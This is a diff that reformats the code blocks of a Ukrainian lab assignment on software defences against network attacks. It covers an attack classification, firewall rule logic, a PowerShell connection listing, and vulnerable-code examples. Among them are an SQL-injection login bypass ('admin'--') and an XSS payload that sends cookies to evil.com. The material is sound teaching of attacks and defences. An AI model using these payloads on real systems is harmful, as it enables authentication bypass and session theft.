--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -93,245 +93,243 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │                                                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │                                                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
       </w:r>
     </w:p>
@@ -579,173 +577,171 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">│                                                                       │</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
       </w:r>
     </w:p>
@@ -1091,80 +1087,84 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">-- Вразливий код:</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">SELECT * FROM users WHERE login='$input' AND pass='$pass'</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">-- Атака:</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">login: admin'--</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">pass: anything</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">-- Результат:</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">SELECT * FROM users WHERE login='admin'--' AND pass='anything'</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">-- Коментар '--' ігнорує перевірку пароля</w:t>
       </w:r>
     </w:p>
@@ -1183,53 +1183,57 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">&lt;!-- Вразливий код: --&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">&lt;!-- Атака: --&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">?name=&lt;script&gt;document.location='http://evil.com/steal.php?c='+document.cookie&lt;/script&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;</w:t>
       </w:r>
     </w:p>
@@ -1559,80 +1563,84 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Перегляд активних TCP-з'єднань</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetTCPConnection | Where-Object State -eq 'Established' |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
